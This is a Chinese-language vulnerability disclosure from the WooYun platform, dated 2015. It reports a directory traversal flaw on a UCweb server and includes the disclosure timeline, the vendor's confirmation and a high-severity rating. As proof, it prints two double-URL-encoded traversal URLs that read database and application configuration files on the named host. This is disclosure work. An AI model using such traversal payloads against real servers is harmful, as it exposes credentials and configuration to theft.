漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-01-24:	细节已通知厂商并且等待厂商处理中
									2015-01-26:	厂商已经确认,细节仅向厂商公开
									2015-02-05:	细节向核心白帽子及相关领域专家公开
									2015-02-15:	细节向普通白帽子公开
									2015-02-25:	细节向实习白帽子公开
									2015-03-10:	细节向公众公开
								
简要描述:
UCweb某站点目录遍历,导致各种敏感配置信息泄漏
详细说明:
目录遍历位于:
非root,可读取较大量的敏感配置信息。 
漏洞证明:
比较有价值的用户:
.bash_history泄漏了很多信息:
http://mfw.uc.cn/download/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//home/jws/apps/appserver/conf/db.conf
http://mfw.uc.cn/download/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//home/jws/apps/appserver/conf/application.conf
修复方案:
修复目录遍历漏洞
版权声明:转载请注明来源 lijiejie@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-01-26 10:09
厂商回复:
漏洞存在,已转给相关人员处理,非常感谢!
最新状态:
暂无

 
                 
                        